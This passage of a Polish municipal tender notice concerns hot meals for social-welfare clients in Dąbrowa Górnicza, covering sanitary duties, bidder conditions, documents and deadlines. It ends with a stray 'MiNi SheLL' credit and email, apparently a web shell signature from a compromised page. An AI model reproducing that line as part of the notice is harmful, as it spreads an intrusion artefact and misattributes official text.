19) Wykonawca będzie ponosił pełną odpowiedzialność za przestrzeganie zasad dotyczących przygotowania i wydawania posiłków zgodnie z wymogami i przepisami Sanepid-u.
20) Wykonawca jest zobowiązany posiadać ważną decyzję (zezwolenie, opinię, protokół) lub inny dokument właściwego inspektora sanitarnego o dopuszczeniu obiektu do przygotowywania posiłków i wydawania posiłków w zbiorowym żywieniu.
21) Wykonawca będzie pobierał i przechowywał próbki każdej składowej części potrawy z dostarczonej partii żywności w ilościach niezbędnych do przeprowadzenia badań laboratoryjnych - zgodnie z obowiązującymi przepisami.
22) Pracownicy przygotowujący i wydający posiłki muszą mieć ważne badania, określone właściwymi przepisami Sanepid.
23) Wykonawca będzie zobowiązany do umożliwienia Zamawiającemu przeprowadzenie kontroli poprawności realizacji postanowień umowy.
24) Wykonawca przejmie odpowiedzialność za szkody wyrządzone przez klientów MOPS.
25) Wykonawca zobowiązany jest do przestrzegania przepisów przeciwpożarowych.

1.5  Zadanie 5 - dotyczy: 
Przygotowanie oraz wydawanie gorącego posiłku dla klientów Miejskiego Ośrodka Pomocy Społecznej w Dąbrowie Górniczej korzystających z pomocy społecznej w dzielnicy Dąbrowa Górnicza   - Gołonóg

1) Przewidywana ilość posiłków wynosi:  7 320 na okres 12 miesięcy
c)	Dziennie: maksymalnie    -    20 posiłków dziennie
         minimalnie        -    15 posiłków dziennie
d)	W skali zamówienia: 7 320 posiłków.
2) Ilość gorących posiłków będzie ulegać zmianie w skali zamówienia w zależności od bieżących potrzeb osób kwalifikujących się do tego rodzaju pomocy społecznej w ramach ilości określonej w pkt 1 lit b, z tym zastrzeżeniem, iż w przypadku nie wyczerpania  maksymalnej kwoty zabezpieczonej w budżecie, Wykonawcy nie przysługują z tego tytułu żadne roszczenia, w tym  o zapłatę odszkodowania. Podobnie  Wykonawcy nie przysługują względem Zamawiającego żadne roszczenia, w tym o zapłatę odszkodowania w przypadku nie zapewnienia przez Zamawiającego minimalnej ilości posiłków, gdyż ilość ta jest jedynie szacunkowa, a ryzyko z tego tytułu  zgodnie z wolą stron  obciąża Wykonawcę. 
3) Wykonawca zagwarantuje przygotowanie oraz wydanie gorącego posiłku dla klientów MOPS w odpowiednio przygotowanym pomieszczeniu, zgodnie z przepisami Sanepid- u, BHP i P.poż..
4) Gorący posiłek będzie wydawany codziennie w określonych godzinach tj.  nie krócej niż 3  następujące po sobie godziny dziennie , zaczynając wydawanie nie wcześniej niż o godz. 11.00, a nie później niż o godz. 13.00            
5) Lokal (pomieszczenie), w którym będą wydawane posiłki winien być usytuowany w mieście w dzielnicy Dąbrowa Górnicza   - Gołonóg.
6) Posiłki będą urozmaicone według uznania Wykonawcy. 
7) Posiłki muszą być przygotowywane ze świeżych komponentów z uwzględnieniem prawidłowych wartości odżywczych i kalorycznych przy zapewnieniu gramatury określonej w kalkulacji stanowiącej załącznik nr 4e do niniejszej SIWZ.
8) Posiłki będą wydawane w naczyniach jednorazowych, dopuszcza się używanie naczyń wielorazowych przy zachowaniu przepisów higienicznych dotyczących mycia naczyń i stosowania dopuszczonych przez Sanepid środków myjących zgodnie z zasadami systemu HACCP.
9) Wykonawca zobowiązany jest do wywieszania w jadłodajni tygodniowego jadłospisu wraz z gramaturą, a po zakończonym miesiącu dostarczania tygodniowych zrealizowanych jadłospisów do Zamawiającego.
10) Merytoryczny sposób rozliczania i wydawania posiłków będzie uzgodniony z odpowiedzialnymi (wyznaczonymi do kontaktu) w tym zakresie pracownikami Zamawiającego.
11) Wydawanie posiłków będzie się odbywało na podstawie otrzymanego  od upoważnionych pracowników Zamawiającego wykazu osób korzystających z pomocy w formie gorącego posiłku,  wykaz o którym mowa będzie uzupełniany przez Wykonawcę w trakcie trwania miesiąca o osoby, które zostały zakwalifikowane do korzystania z pomocy społecznej w formie gorącego posiłku i otrzymały imienne skierowanie na gorący posiłek od uprawnionych pracowników Zamawiającego.
12) Zamawiający co miesiąc będzie dostarczał wykaz, o którym mowa w pkt 11, tj. wykaz osób korzystających z pomocy w formie gorącego posiłku z wyłączeniem miesiąca stycznia, w którym to miesiącu osoby będą zgłaszały się sukcesywnie z imiennym skierowaniem od Zamawiającego.
13) Wykonawca zobowiązany jest do powiadomienia uprawnionego pracownika Zamawiającego o nieobecności klienta przez okres co najmniej jednego dnia. W przypadku nieobecności klienta w wyznaczonych godzinach w danym dniu, klient nie otrzymuje zaległego posiłku w dniu następnym.
14) Wykonawca otrzyma od Zamawiającego najpóźniej  w ostatni dzień miesiąca, poprzedzający miesiąc rozpoczęcia wydawania posiłków, wykaz osób korzystających z pomocy społecznej w formie gorącego posiłku, o którym mowa w pkt 12.
15) Osoby korzystające z posiłku, będą potwierdzały pobranie posiłku własnoręcznym podpisem na wykazie o którym  mowa powyżej.
16) Zamawiający wyda, każdemu klientowi imienne skierowanie upoważniające go do korzystania z gorącego posiłku, ze wskazaniem daty, od której będzie przysługiwał posiłek.
17) W uzasadnionych sytuacjach uniemożliwiających klientowi spożycie posiłku w określonym terminie w czasie obowiązywania decyzji, Wykonawca nie przygotowuje na wniosek Zamawiającego posiłku(ów) w tym terminie i tym samym nie żąda za ten okres zapłaty. Wniosek o którym mowa w niniejszym punkcie winien być zgłoszony Wykonawcy najpóźniej w dniu poprzedzającym planowaną nieobecność klienta na posiłku.
18) Wykonawca będzie ponosił pełną odpowiedzialność za przestrzeganie zasad wynikających z systemu HACCP oraz zapewnienie właściwej jakości zdrowotnej żywności.
19) Wykonawca będzie ponosił pełną odpowiedzialność za przestrzeganie zasad dotyczących przygotowania i wydawania posiłków zgodnie z wymogami i przepisami Sanepid-u.
20) Wykonawca jest zobowiązany posiadać ważną decyzję (zezwolenie, opinię, protokół) lub inny dokument właściwego inspektora sanitarnego o dopuszczeniu obiektu do przygotowywania posiłków i wydawania posiłków w zbiorowym żywieniu.
21) Wykonawca będzie pobierał i przechowywał próbki każdej składowej części potrawy z dostarczonej partii żywności w ilościach niezbędnych do przeprowadzenia badań laboratoryjnych - zgodnie z obowiązującymi przepisami.
22) Pracownicy przygotowujący i wydający posiłki muszą mieć ważne badania, określone właściwymi przepisami Sanepid.
23) Wykonawca będzie zobowiązany do umożliwienia Zamawiającemu przeprowadzenie kontroli poprawności realizacji postanowień umowy.
24) Wykonawca przejmie odpowiedzialność za szkody wyrządzone przez klientów MOPS.
25) Wykonawca zobowiązany jest do przestrzegania przepisów przeciwpożarowych.


UWAGA:
Przed rozstrzygnięciem postępowania o zamówienie publiczne Komisja może dokonać wizytacji lokalu, w którym klienci będą spożywać posiłki, wówczas Wykonawca jest zobowiązany umożliwić komisji przetargowej wizytację lokalu, celem sprawdzenia oferowanych warunków w uprzednio uzgodnionym terminie..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.32.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że posiada   aktualną decyzję, zezwolenie, opinię, protokół lub inny dokument   Stacji  Sanitarno -  Epidemiologicznej  potwierdzający dopuszczenie  żywienia  zbiorowego  w zakładzie gastronomicznym , w którym będzie  realizowana usługa - dla każdego zadania odrębnie.  
Weryfikacja zostanie przeprowadzona wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia z art. 22 ust 1 ustawy Prawo zamówień Publicznych (załącznik nr 2 do SIWZ) - dot. Zadania 1, 2, 3, 4, 5
Weryfikacja zostanie przeprowadzona wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia z art. 22 ust 1 ustawy Prawo zamówień Publicznych (załącznik nr 2 do SIWZ) - dot. Zadania 1, 2, 3, 4, 5
Weryfikacja zostanie przeprowadzona wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku, jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą, która będzie uczestniczyć w wykonaniu zamówienia i będzie posiadała przygotowanie zawodowe gastronomiczne, kucharz lub ukończony kurs gastronomiczny uprawniające do wykonywania usługi określonej niniejszą specyfikacją z uwzględnieniem zapisu rozdz. VII1.3.  - dot. Zadania 1, 2, 3, 4, 5
Weryfikacja zostanie przeprowadzona wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 20 000 zł - dot. Zadania 1, 2, 3, 4, 5
Weryfikacja zostanie przeprowadzona wg formuły spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1 Wypełniony formularz oferty załącznik Nr 1a,  1b ,1c, 1d, 1e do SIWZ (wskazana data podpisania) - dla każdego zadania oddzielnie
2. Wypełniony formularz Kalkulacja cenowa - załącznik Nr 4a, 4b,4c,4d,4e do SIWZ (wskazana data podpisania) - dla każdego zadania oddzielnie
3 Pełnomocnictwo do reprezentacji Wykonawcy. Jeżeli ustanowione jest pełnomocnictwo to musi w swej treści jednoznacznie wskazywać uprawnienie do podpisania oferty lub oferty i umowy. Pełnomocnictwo to musi zostać dołączone do oferty i musi być złożone w formie oryginału lub kopii poświadczonej przez notariusza. Pełnomocnictwo wymagane w przypadku gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia (dotyczy również spółki cywilnej), przedłożone w formie oryginału lub kopii poświadczonej przez notariusza - dla każdego zadania oddzielnie
4 W przypadku, gdy Wykonawca będzie polegał  na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych  do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru  prawnego  łączących go z nimi stosunków  zobowiązany jest udowodnić  Zamawiającemu, że będzie  dysponował zasobami  niezbędnymi do realizacji  zamówienia, a w szczególności  przedstawiając pisemne zobowiązanie tych podmiotów do oddania  mu do dyspozycji  niezbędnych zasobów  na okres  korzystania z nich  przy wykonaniu zamówienia  - zgodnie z art. 26 ust 2b  Ustawy Pzp. Podmiot, który zobowiązał się do udostępnienia zasobów o których mowa w ust. VII 4.3 odpowiada solidarnie z wykonawcą za szkodę Zamawiającego, chyba, że za nieudostępnienie zasobów nie ponosi winy zgodnie z art. 26 ust 2e Ustawy Pzp - dla każdego zadania oddzielnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Ilość godzin (czas)  wydawania gorącego  posiłku  klientom MOPS - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której  dokonano wyboru Wykonawcy, w przypadku:
a. Zmiany terminu wykonania zamówienia na skutek wystąpienia siły wyższej czyli wydarzenia nieprzewidywalnego w chwili podpisywania umowy lub inne okoliczności niezależne od Zamawiającego, w tym takich, których Zamawiający przy zachowaniu należytej staranności nie był w stanie uniknąć lub przewidzieć np. nietypowe dla klimatu polskiego zjawiska bądź zdarzenia atmosferyczne lub inne. 
b. Zmian przepisów prawa istotnych dla postanowień zawartej umowy.
c. W przypadku zmiany przepisów prawa wyznaczających wysokość należnego podatku VAT na usługi objęte przedmiotem zamówienia, w czasie trwania niniejszej umowy, Wykonawca zastosuje obowiązujący podatek VAT przy założeniu, iż ceny jednostkowe netto pozostaną niezmienne. W przypadku zwiększenia stawki podatku VAT ceny jednostkowe brutto z załącznika nr 4 kalkulacja cenowa zostaną odpowiednio powiększone w odniesieniu do cen zadeklarowanych w kalkulacji, maksymalna wartość umowy nie ulegnie zmianie w okresie obowiązywania umowy, natomiast w przypadku zmniejszenia stawki podatku VAT ceny jednostkowe brutto z załącznika nr 4 kalkulacja cenowa zostaną odpowiednio pomniejszone w odniesieniu do cen zadeklarowanych 
w kalkulacji.
2. Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół podpisany przez obie strony. 
3. Zmiana umowy powinna nastąpić w formie pisemnej zawierającej uzasadnienie faktyczne 
i prawne zmiany, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Alei Józefa Piłsudskiego 2
41-300 Dąbrowa Górnicza , pok. nr  116, I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.12.2015 godzina 10:30, miejsce: Aleja Józefa Piłsudskiego 2
41-300 Dąbrowa Górnicza, pok. nr  116, I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.1 W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów na zasobach których, na zasadach określonych w art. 26 ust 2b ustawy Pzp polega Wykonawca, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów są poświadczone za zgodność z oryginałem przez Wykonawcę lub te podmioty.
1.2 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia powinni spełniać warunki udziału w postępowaniu określone w rozdz. VI oraz złożyć dokumenty i oświadczenia potwierdzające spełnienie tych warunków, zgodnie z zapisami zawartymi w rozdz. VII SIWZ.
1.3 W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców do oferty muszą być załączone dokumenty i oświadczenia zawarte w rozdz. VII.2.2 przez każdego z Wykonawców lub przez pełnomocnika w imieniu każdego z nich. Dokument wymieniony w rozdz. VII.3.1 SIWZ każdy z Wykonawców składa oddzielnie.
Oświadczenie wymienione w rozdz. VII.1.1 SIWZ winno być podpisane przez uprawnionego przedstawiciela Wykonawców lub wspólnie na jednym druku przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
W odniesieniu do dokumentów i oświadczeń wskazanych w rozdz. VII.1.2 i VII.1.3, VII.1.4, SIWZ - jeżeli Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, dokument ten składa przynajmniej jeden z nich.
Formularz ofertowy wymieniony w rozdz. VII.4.1 (załącznik Nr 1a,  1b ,1c, 1d, 1e do SIWZ), formularz kalkulacji cenowej wymieniony w rozdz. VII.4.2 (załącznik Nr 4a, 4b,4c,4d,4e do SIWZ) winien być podpisany przez uprawnionych przedstawicieli Wykonawców.
1.4 Ponadto ww. Wykonawcy ustanowią pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i przy zawarciu umowy (dotyczy również Spółki Cywilnej). 
Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem.
1.5 W przypadku wyboru najkorzystniejszej oferty złożonej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego przed podpisaniem umowy konieczne jest przedłożenie umowy konsorcjum (Wykonawców występujących wspólnie), która będzie regulować wzajemną współpracę Wykonawców, czyli zawiera postanowienia dotyczące m. in. realizacji poszczególnych części zamówienia, sposobu dokonywania rozliczeń. Zgodnie z treścią art. 141 ustawy Pzp Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy. Zasady solidarnej odpowiedzialności zostały uregulowane w art. 366 § 1 Kodeksu Cywilnego.
1.6 W przypadku, gdy z załączonych do oferty dokumentów nie wynika sposób reprezentacji Wykonawcy, przed podpisaniem umowy Zamawiający wymaga przedłożenia dokumentu (pełnomocnictwa) z którego wynika uprawnienie osoby lub osób do składania oświadczeń woli i reprezentowania Wykonawcy.
2. TERMIN WYKONANIA ZAMÓWIENIA 12 miesięcy: tj. od 01.01.2016 r. do 31.12.2016 r. 
lub do wyczerpania środków budżetowych zabezpieczonych na ten cel.
3. Dalszy ciąg nazwy zadania z pkt. II.1.1) ogłoszenia: 
Zadanie 1- Przygotowanie oraz wydawanie gorącego posiłku dla bezdomnych klientów Miejskiego Ośrodka Pomocy Społecznej w Dąbrowie Górniczej korzystających z pomocy społecznej

Zadanie 2 - Przygotowanie oraz wydawanie gorącego posiłku dla klientów Miejskiego Ośrodka Pomocy Społecznej w Dąbrowie Górniczej korzystających z pomocy społecznej w dzielnicy Dąbrowa Górnicza  - Ząbkowice. 

Zadanie 3 - Przygotowanie oraz wydawanie gorącego posiłku dla klientów Miejskiego Ośrodka Pomocy Społecznej w Dąbrowie Górniczej korzystających z pomocy społecznej w  dzielnicy Dąbrowa Górnicza  - Strzemieszyce. 

Zadanie 4 - Przygotowanie oraz wydawanie gorącego posiłku dla klientów Miejskiego Ośrodka Pomocy Społecznej w Dąbrowie Górniczej korzystających z pomocy społecznej w dzielnicy Dąbrowa Górnicza  - Centrum Dąbrowa Górnicza. 

Zadanie 5 - Przygotowanie oraz wydawanie gorącego posiłku dla klientów Miejskiego Ośrodka Pomocy Społecznej w Dąbrowie Górniczej korzystających z pomocy społecznej w dzielnicy Dąbrowa Górnicza   - Gołonóg.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com